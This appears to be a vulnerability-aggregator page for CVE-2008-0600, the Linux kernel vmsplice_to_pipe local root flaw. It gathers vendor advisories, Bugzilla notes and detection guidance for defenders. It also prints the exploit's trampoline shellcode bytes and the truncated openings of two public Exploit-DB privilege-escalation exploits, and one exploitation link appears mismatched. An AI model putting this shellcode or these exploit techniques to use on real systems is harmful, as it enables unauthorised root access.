CVE-2008-0600
published 2008-02-12CVE-2008-0600: The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local…
PriorityP276high7.2CVSS 2.0
AVLACLAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
3.54%
87.8th percentile
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
Affected
69 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x8b\x5c\x24\x04\x8b\x4c\x24\x08\x81\xfb\x69\x7a\x00\x00\x75\x02\xff\xd1\xb8\xea\xff\xff\xff\xc3
- →Detect local privilege escalation via vmsplice syscall (NR 316 on i386, NR 278 on x86_64) with an iov_len of ULONG_MAX (0xffffffffffffffff), which is the key exploit primitive for CVE-2008-0600. ↗
- →Monitor for unprivileged processes reading /proc/kallsyms to resolve kernel symbol addresses (sys_vm86old pattern used by exploit 5093 to locate syscall table entry for patching). ↗
- →Alert on kernel log messages containing 'vmsplice: Bad address' which indicates a blocked exploit attempt against CVE-2008-0600. ↗
- →Detect the trampoline shellcode byte sequence used by exploit 5093: cmp $31337,%ebx followed by indirect call, characteristic of the vmsplice kernel-code injection payload. ↗
- →Look for MAP_FIXED anonymous mmap calls immediately followed by vmsplice syscall from the same process — the exploit uses MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS to set up controlled kernel page structures before triggering the vulnerability. ↗
- →The exploit targets the vmsplice_to_pipe function in fs/splice.c; kernel versions 2.6.17 through 2.6.24.1 are affected. Patch adds access_ok(VERIFY_READ, base, len) check. ↗
- ·CVE-2008-0600 affects Linux kernel 2.6.17 through 2.6.24.1 only; Red Hat Enterprise Linux 2.1, 3, and 4 are NOT affected. Only RHEL5 (kernel 2.6.18 based) is affected. ↗
- ·The public exploit (milw0rm 5092) has bugs that cause it to segfault on some i386 architectures (e.g., athlon bare metal) but works reliably on XenU guests and some SMP systems; x86_64 exploitation requires modification of the exploit. ↗
- ·Running the exploit may cause kernel instability and system crashes even when exploitation is unsuccessful; do not use exploit reproduction in production environments. ↗
- ·CVE-2008-0009 and CVE-2008-0010 are distinct vmsplice vulnerabilities (vmsplice_to_user) affecting only kernels 2.6.22+; do not conflate detection signatures with CVE-2008-0600 (vmsplice_to_pipe, 2.6.17+). ↗
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vulncheck2.1LOW
vendor_ubuntu7.2HIGH
vendor_redhat2.1LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-vv62-ccxv-738x: The vmsplice_to_pipe function in Linux kernel 2
ghsa_unreviewed·2022-05-01·CVSS 2.1
CVE-2008-0600 [LOW] CWE-94 GHSA-vv62-ccxv-738x: The vmsplice_to_pipe function in Linux kernel 2
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
VulnCheck
Linux Kernel Improper Control of Generation of Code ('Code Injection')
vulncheck·2008·CVSS 2.1
CVE-2008-0600 [LOW] Linux Kernel Improper Control of Generation of Code ('Code Injection')
Linux Kernel Improper Control of Generation of Code ('Code Injection')
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
Affected: Linux Kernel
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://isc.sans.edu/diary/SSH+new+brute+force+tool/9370/
Ubuntu
Linux kernel vulnerability
vendor_ubuntu·2008-02-12·CVSS 7.2
CVE-2008-0600 [HIGH] Linux kernel vulnerability
Title: Linux kernel vulnerability
Summary: Linux kernel vulnerability
Wojciech Purczynski discovered that the vmsplice system call did
not properly perform verification of user-memory pointers. A local
attacker could exploit this to overwrite arbitrary kernel memory
and gain root privileges. (CVE-2008-0600)
Instructions: After a standard system upgrade you need to reboot your computer to
effect the necessary changes.
Red Hat
kernel vmsplice_to_pipe flaw
vendor_redhat·2008-02-09·CVSS 2.1
CVE-2008-0600 [LOW] CWE-119 kernel vmsplice_to_pipe flaw
kernel vmsplice_to_pipe flaw
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
Statement: This issue did not affect the versions of the Linux kernel as shipped with Red Hat Enterprise Linux 2.1, 3, 4.
No detection rules found.
Exploit-DB
Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)
exploitdb·2008-02-09
CVE-2008-0600 Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)
Linux Kernel 2.6.17
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
void exit_code();
char exit_stack[1024 * 1024];
void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0
Exploit-DB
Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1)
exploitdb·2008-02-09
CVE-2008-0600 Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1)
Linux Kernel 2.6.23
#include
#include
#include
#include
#include
#define TARGET_PATTERN " sys_vm86old"
#define TARGET_SYSCALL 113
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4)
#define TRAMP_CODE (void *) trampoline
#define TRAMP_SIZE ( sizeof(trampoline) - 1 )
unsigned char trampoline[] =
"\x8b\x5c\x24\x04" /* mov 0x4(%esp),%ebx */
"\x8b\x4c\x24\x08" /* mov 0x8(%esp),%ecx */
"\x81\xfb\x69\x7a\x00\x00" /* cmp $31337,%ebx */
"\x75\x02" /* jne +2 */
"\xff\xd1" /* call *%ecx */
"\xb8\xea\xff\xff\xff" /* mov $-EINVAL,%eax */
"\xc3" /* ret */
;
void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror
Bugzilla
CVE-2008-0600 kernel vmsplice_to_pipe flaw
bugzilla·2008-02-10·CVSS 2.1
CVE-2008-0600 [LOW] CVE-2008-0600 kernel vmsplice_to_pipe flaw
CVE-2008-0600 kernel vmsplice_to_pipe flaw
A new system call named vmsplice() was introduced in the 2.6.17
release of the Linux kernel.
COSEINC reported two issues affecting vmsplice, CVE-2008-0009 and CVE-2008-0010.
On Saturday 20080210 a public exploit was released that utilised a similar flaw
in vmsplice (vmsplice_to_pipe function) to allow a local user to gain privileges
on some architectures.
See also
http://marc.info/?t=120263655300003&r=1&w=2
This issue will affect kernels 2.6.17+ and therefore affected Red Hat Enterprise
Linux 5, but not Red Hat Enterprise Linux 4, 3, or 2.1.
Discussion:
Note that there may be a little confusion as there are actually three vmsplice
issues:
CVE-2008-0009 is already fixed upstream, does not affect any RHEL, has no
public exploit. Upstream pat
Bugzilla
CVE-2008-0009 kernel: Inappropriate dereference of user-supplied memory pointers
bugzilla·2008-02-01·CVSS 2.1
CVE-2008-0009 [LOW] CVE-2008-0009 kernel: Inappropriate dereference of user-supplied memory pointers
CVE-2008-0009 kernel: Inappropriate dereference of user-supplied memory pointers
Description of problem:
A new system call named vmsplice() was introduced in the 2.6.17
release of the Linux kernel.
Inappropriate dereference of user-supplied memory pointers in the
code beginning at line 1378 in the vmsplice_to_user() kernel
function (fs/splice.c):
The patch for this issue not provided by the reporter.
Discussion:
see bug #432251
---
There was a bit of confusion as the code changed since introduction 2.6.17, so
Red Hat Enterprise Linux kernels had code different to upstream.
CVE-2008-0009 and CVE-2008-0010 only affected kernels 2.6.22+ so Red Hat
Enterprise Linux was not affected
CVE-2008-0600 affected kernels 2.6.17+ so affects Red Hat Enterprise Linux 5.
Closing this CVE-2008-000
http://lists.opensuse.org/opensuse-security-announce/2008-02/msg00005.htmlhttp://lists.opensuse.org/opensuse-security-announce/2008-03/msg00002.htmlhttp://lists.opensuse.org/opensuse-security-announce/2008-06/msg00006.htmlhttp://marc.info/?l=linux-kernel&m=120263652322197&w=2http://marc.info/?l=linux-kernel&m=120264520431307&w=2http://marc.info/?l=linux-kernel&m=120264773202422&w=2http://marc.info/?l=linux-kernel&m=120266328220808&w=2http://marc.info/?l=linux-kernel&m=120266353621139&w=2http://secunia.com/advisories/28835http://secunia.com/advisories/28858http://secunia.com/advisories/28875http://secunia.com/advisories/28889http://secunia.com/advisories/28896http://secunia.com/advisories/28912http://secunia.com/advisories/28925http://secunia.com/advisories/28933http://secunia.com/advisories/28937http://secunia.com/advisories/29245http://secunia.com/advisories/30818http://securitytracker.com/id?1019393http://wiki.rpath.com/Advisories:rPSA-2008-0052http://wiki.rpath.com/wiki/Advisories:rPSA-2008-0052http://www.debian.org/security/2008/dsa-1494http://www.mandriva.com/security/advisories?name=MDVSA-2008:043http://www.mandriva.com/security/advisories?name=MDVSA-2008:044http://www.redhat.com/support/errata/RHSA-2008-0129.htmlhttp://www.securityfocus.com/archive/1/488009/100/0/threadedhttp://www.securityfocus.com/bid/27704http://www.securityfocus.com/bid/27801http://www.ubuntu.com/usn/usn-577-1http://www.vupen.com/english/advisories/2008/0487/referenceshttps://bugzilla.redhat.com/show_bug.cgi?id=432229https://bugzilla.redhat.com/show_bug.cgi?id=432517https://issues.rpath.com/browse/RPL-2237https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11358https://www.exploit-db.com/exploits/5092https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00254.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-February/msg00255.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-February/msg00270.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-February/msg00485.htmlhttp://lists.opensuse.org/opensuse-security-announce/2008-02/msg00005.htmlhttp://lists.opensuse.org/opensuse-security-announce/2008-03/msg00002.htmlhttp://lists.opensuse.org/opensuse-security-announce/2008-06/msg00006.htmlhttp://marc.info/?l=linux-kernel&m=120263652322197&w=2http://marc.info/?l=linux-kernel&m=120264520431307&w=2http://marc.info/?l=linux-kernel&m=120264773202422&w=2http://marc.info/?l=linux-kernel&m=120266328220808&w=2http://marc.info/?l=linux-kernel&m=120266353621139&w=2http://secunia.com/advisories/28835http://secunia.com/advisories/28858http://secunia.com/advisories/28875http://secunia.com/advisories/28889http://secunia.com/advisories/28896http://secunia.com/advisories/28912http://secunia.com/advisories/28925http://secunia.com/advisories/28933http://secunia.com/advisories/28937http://secunia.com/advisories/29245http://secunia.com/advisories/30818http://securitytracker.com/id?1019393http://wiki.rpath.com/Advisories:rPSA-2008-0052http://wiki.rpath.com/wiki/Advisories:rPSA-2008-0052http://www.debian.org/security/2008/dsa-1494http://www.mandriva.com/security/advisories?name=MDVSA-2008:043http://www.mandriva.com/security/advisories?name=MDVSA-2008:044http://www.redhat.com/support/errata/RHSA-2008-0129.htmlhttp://www.securityfocus.com/archive/1/488009/100/0/threadedhttp://www.securityfocus.com/bid/27704http://www.securityfocus.com/bid/27801http://www.ubuntu.com/usn/usn-577-1http://www.vupen.com/english/advisories/2008/0487/referenceshttps://bugzilla.redhat.com/show_bug.cgi?id=432229https://bugzilla.redhat.com/show_bug.cgi?id=432517https://issues.rpath.com/browse/RPL-2237https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11358https://www.exploit-db.com/exploits/5092https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00254.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-February/msg00255.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-February/msg00270.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-February/msg00485.html
2008-02-12
Published
Exploited in the wild